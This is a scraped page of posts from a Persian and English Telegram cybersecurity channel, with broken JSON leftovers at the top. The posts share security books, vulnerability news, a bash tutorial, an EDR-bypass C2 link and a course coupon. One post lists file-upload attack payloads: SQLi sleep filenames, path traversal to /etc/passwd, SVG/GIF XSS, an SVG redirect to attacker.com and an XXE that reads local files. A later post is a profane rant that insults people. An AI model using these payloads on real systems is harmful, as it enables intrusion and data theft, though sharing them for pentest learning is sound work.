en
Feedback
Network Security Channel

Network Security Channel

Open in Telegram

⭕️Start Channel From 2017⭕️ ✅ Security Operation Center (SOC) ✅ Bug Bounty ✅ Vulnerability ✅ Pentest ✅ Hardening ✅ Linux ✅ Reasearch ✅ Security Network ✅ Security Researcher ✅ DevSecOps ✅ Blue Team ✅ Red Team

Show more
2 974
Subscribers
+524 hours
+147 days
+3430 days
Posts Archive
\n\n\nOpen redirect \n\n\n\n\n\n\n\nXXE \n\n ]>\n&xxe;\n","datePublished":"2024-08-11T05:56:34Z","dateModified":"2024-08-11T05:56:34Z","author":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"publisher":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":250},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20093","url":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20093","mainEntityOfPage":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20093","headline":"The Way to Android Root: Exploiting Your GPU On Smartphone (#CVE-2024-23380) @Engineer_Computer","articleBody":"The Way to Android Root: Exploiting Your GPU On Smartphone (#CVE-2024-23380)\n@Engineer_Computer","datePublished":"2024-08-10T21:11:26Z","dateModified":"2024-08-10T21:11:26Z","author":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"publisher":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":232},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20092","url":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20092","mainEntityOfPage":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20092","headline":"@Engineer_Computer","articleBody":"@Engineer_Computer","datePublished":"2024-08-10T21:11:26Z","dateModified":"2024-08-10T21:11:26Z","author":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"publisher":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":249}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20091","url":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20091","mainEntityOfPage":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20091","headline":"با ETW بصورت عمیق آشنا شوید https://blog.trailofbits.com/2023/11/22/etw-internals-for-security-research-and-f…","articleBody":"با ETW بصورت عمیق آشنا شوید \n\nhttps://blog.trailofbits.com/2023/11/22/etw-internals-for-security-research-and-forensics/\n\n@Engineer_Computer","datePublished":"2024-08-10T21:08:10Z","dateModified":"2024-08-10T21:08:10Z","author":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"publisher":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":277},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20089","url":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20089","mainEntityOfPage":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20089","headline":"#موقت Mastering of Python Script for System Administrator Coupon : 25FC2EF9F608AA536822 Link : https://www.ud…","articleBody":"#موقت\nMastering of Python Script for System Administrator\n\nCoupon : 25FC2EF9F608AA536822\n\nLink : \nhttps://www.udemy.com/course/mastering-of-python-script-for-system-administrator/?couponCode=25FC2EF9F608AA536822\n\n@Engineer_Computer","datePublished":"2024-08-10T19:06:03Z","dateModified":"2024-08-10T19:06:03Z","author":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"publisher":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":311},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":6}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20088","url":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20088","mainEntityOfPage":"https://telemetr.io/en/channels/1090197077-engineer_computer/posts/20088","headline":"سلام دوستان به صحبت دلی دارم در مورد عزیزانی که سیستم ندارن و میان پیش من میگن میخوایم امنیت یاد بگیریم شبکه…","articleBody":"سلام دوستان\nبه صحبت دلی دارم در مورد عزیزانی که سیستم ندارن و میان پیش من میگن میخوایم امنیت یاد بگیریم شبکه یاد بگیریم میخوام استخدام شیم جاهای خوب \nبعد از کلی مشاوره و گرفتن وقت من و خودتون که ساعت ها رایگان طبق حس مثبتی که در این باب دارم انجام میدم بهم پیام میدین \" دارم میرم کربلا و دعای خیر ما پشت سر شما هست \"\nبرادر من خواهر من \nتو سیستم نداری کار کنی ! بعد میری 30 میلیون میدی بری کربلا ؟؟\nمن نمیگم کربلا بده یا خوبه - به من ربطی نداره هر کسی اعتقادات خودشو داره وظیفهد همه مونم هست احترام بزاریم بهش \nولی ادم چقدر گاو باشه !! که سیستم نداره ولی بره 30 میلیون بده برای کربلا یا هر سفر دیگه ...\n\nبه نظرم یه جای کار میلنگه اونم اینکه به قول اوستامون گفت \" تخم ادم خر کس ور نمیافته\"\nواقعا بعضیا کسخلن و وقت مارم گرفتن ...\nممنون","datePublished":"2024-08-10T17:23:23Z","dateModified":"2024-08-11T09:52:45Z","author":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"publisher":{"@type":"Organization","name":"Network Security Channel","url":"https://telemetr.io/en/channels/1090197077-engineer_computer","image":"https://img.tlmtr.io/c/1bMm3P/5791648444312569822?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":162},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":26},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":5}]}}]}
Year : 2025 Pages : 683 Edition : null #security #cybersecurity #network #Monitoring #cisco #book @Engineer_Computer

info OSINT End-of-life (EOL) and support information for various products https://endoflife.date @Engineer_Computer

PKfail Supply - Chain Failures in Secure Boot Key Management @Engineer_Computer

Hardware Security PKfail Research Report 2024. https://www.binarly.io/blog/pkfail-u @Engineer_Computer —————————————————— #CyberSecurity #Hardware #CVE #SecureBusinessContinuity

#DiyakoSecureBow ———————————— CISO as A Service (vCISO) Techbook WebApp Security Web Application Security: Exploitation and Countermeasures for Modern Web Applications 2024. —————————————————— #CyberSecurity #webapp #OWASP #secure @Engineer_Computer

💠چگونه در زبان بش از یک تابع، یک مقدار را برگردانیم؟ مثال در python:
def add(x, y):
    return x + y

result = add(3, 4)

print(result)
خروجی کد بالا عدد ۷ خواهد بود. بش: (روش اول)
#!/bin/bash

add() {
    return $(($1 + $2))
}

add 3 4
result=$?

echo $result
روش دوم: (کوتاه‌تر)
#!/bin/bash

add() {
    echo $(($1 + $2))
}

add 3 4
توضیحات: در روش اول که کمی طولانی‌تره، ما میام خروجی تابع رو با استفاده از متغیر داخلی بش ?$ نمایش می‌دیم. این متغیر درواقع exit code دستور قبلی رو ذخیره می‌کنه. توابع در بش مقداری رو مثل پایتون برنمی‌گردونن و صرفا exit code که عددی بین ۰ تا ۲۵۵ است رو برمی‌گردونن. در تابع add، عبارت return درواقع باعث می‌شه که جمع آرگومان‌های تابع به‌عنوان exit status گزارش بشه. متغیر داخلی ?$ این exit status رو ذخیره می‌کنه، که می‌شه جمع ۳ و ۴ و عدد ۷ رو نمایش می‌ده. در مثال دوم که ساده‌تره و راحت‌تر هم هست ما پارامترهای 1$ و 2$ رو به تابع می‌دیم و از اونجایی که اکو در تابع تعریف شده، مقدار برگردانده می‌شه و در ترمینال چاپ میشه. @Engineer_Computer #آموزش #لینوکس #بش

Do you often wonder how to use PowerShell 7 in the server without switching to SSH-based remoting? https://awakecoding.com/posts/enable-powershell-winrm-remoting-in-powershell-7/ @Engineer_Computer

In today's world of expanding digital communications, APIs serve as crucial bridges between systems. Given their importance,
In today's world of expanding digital communications, APIs serve as crucial bridges between systems. Given their importance, defending APIs against attacks and malicious intrusions has become a key priority. Implementing advanced security protocols, robust authentication, and continuous monitoring are among the strategies that can ensure API security and protect sensitive data. @Engineer_Computer

🔴 خطر حمله RCE به میلیون‌ها دستگاه با آسیب‌پذیری‌های بحرانی OpenVPN محققان مایکروسافت به تازگی چندین آسیب‌پذیری با شدت متوسط
🔴 خطر حمله RCE به میلیون‌ها دستگاه با آسیب‌پذیری‌های بحرانی OpenVPN محققان مایکروسافت به تازگی چندین آسیب‌پذیری با شدت متوسط و به بالا را در OpenVPN که یک نرم‌افزار متن‌باز VPN پرکاربرد است را کشف کرده‌اند. نرم‌افزار OpenVPN توسط هزاران شرکت در صنایع مختلف، از‌جمله فناوری اطلاعات، خدمات مالی، مخابرات و نرم‌افزار‌های کامپیوتری، بر روی پلتفرم‌های اصلی مانند Windows، iOS، macOS، Android و BSD استفاده می‌شود. این آسیب‌پذیری‌ها می‌توانند برای دستیابی به اجرای کد از راه دور (RCE) و افزایش اختیار محلی مورد سواستفاده قرار گیرند، که می‌تواند به مهاجمان اجازه دهد کنترل کامل دستگاه‌های هدف را به دست آورند. این امر خطر نقض داده‌ها، به خطر افتادن سیستم و دسترسی غیرمجاز به اطلاعات حساس را به همراه دارد. آسیب‌پذیری‌ها در معماری سمت سرویس گیرنده OpenVPN، به ویژه در مکانیسم ارتباطی بین فرآیند openvpn[.]exe و سرویس openvpnserv[.]exe شناسایی شدند. #Cybersecurity #Cyber_Attack #OpenVPN #RCE #DoS #VPN #Windows #Android #macOS #Vulnerability #امنیت_سایبری #حمله_سایبری #وی_پی_ان #ویندوز #مک @-Engineer_Computer

یک فریم ورک محبوب متن باز برای C2 ** فکر کنید حالا که EDR را دور می‌زند چه کنیم ؟ https://medium.com/@sam.rothlisberger/havoc-c2-with-av-edr-bypass-methods-in-2024-part-1-733d423fc67b @Engineer_Computer

MITRE research firm reveals alarming details about a recent cyber attack that dates back to late 2023. Adversary used backdoors, web shells, and credential harvesting to breach VMware infrastructure. 🔗 Read details: https://thehackernews.com/2024/05/china-linked-hackers-used-rootrot.html @Engineer_Computer

⭕️ استفاده از مدل‌های Large Language Models (LLMs) در کشف آسیب پذیری‌ها به شکل چشمگیری امنیت سایبری را متحول می‌کند، با خودکارسازی شناسایی آسیب‌پذیری‌ها، بهبود تحلیل تهدیدها. این مدل‌های پیشرفته، مانند GPT-4، به طور قابل توجهی بهره‌وری را با اسکن سریع کد، Generating Test Cases و ارائه گزارش‌های دقیق از آسیب‌پذیری‌ها بهبود می‌بخشند. توانایی آن‌ها در پردازش و تحلیل حجم عظیمی از داده‌ها به متخصصان امنیت کمک می‌کند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLM‌ها در برنامه‌های Bug Bounty نه تنها شناسایی نقص‌های امنیتی را تسریع می‌کند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت می‌کند. https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/ The use of Large Language Models (LLMs) in vulnerability discovery will dramatically revolutionize cyber security by automating vulnerability detection and improving threat analysis. These advanced models, such as GPT-4, significantly improve productivity by quickly scanning code, generating test cases, and providing detailed reports of vulnerabilities. Their ability to process and analyze massive amounts of data helps security professionals identify and fix potential vulnerabilities more effectively. Integrating LLMs into Bug Bounty programs not only accelerates the detection of security flaws, but also optimizes the overall threat detection process and, as a result, strengthens the defense against evolving cyber threats. https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/ #LLM @Engineer_Computer

Chaining Vulnerabilities through File Upload SLQi
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal
../../etc/passwd/logo.png
../../../logo.png
XSS
->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

->  Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>
Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>

The Way to Android Root: Exploiting Your GPU On Smartphone (#CVE-2024-23380) @Engineer_Computer
The Way to Android Root: Exploiting Your GPU On Smartphone (#CVE-2024-23380) @Engineer_Computer

#موقت Mastering of Python Script for System Administrator Coupon : 25FC2EF9F608AA536822 Link : https://www.udemy.com/course/m
+1
#موقت Mastering of Python Script for System Administrator Coupon : 25FC2EF9F608AA536822 Link : https://www.udemy.com/course/mastering-of-python-script-for-system-administrator/?couponCode=25FC2EF9F608AA536822 @Engineer_Computer

سلام دوستان به صحبت دلی دارم در مورد عزیزانی که سیستم ندارن و میان پیش من میگن میخوایم امنیت یاد بگیریم شبکه یاد بگیریم میخوام استخدام شیم جاهای خوب بعد از کلی مشاوره و گرفتن وقت من و خودتون که ساعت ها رایگان طبق حس مثبتی که در این باب دارم انجام میدم بهم پیام میدین " دارم میرم کربلا و دعای خیر ما پشت سر شما هست " برادر من خواهر من تو سیستم نداری کار کنی ! بعد میری 30 میلیون میدی بری کربلا ؟؟ من نمیگم کربلا بده یا خوبه - به من ربطی نداره هر کسی اعتقادات خودشو داره وظیفهد همه مونم هست احترام بزاریم بهش ولی ادم چقدر گاو باشه !! که سیستم نداره ولی بره 30 میلیون بده برای کربلا یا هر سفر دیگه ... به نظرم یه جای کار میلنگه اونم اینکه به قول اوستامون گفت " تخم ادم خر کس ور نمیافته" واقعا بعضیا کسخلن و وقت مارم گرفتن ... ممنون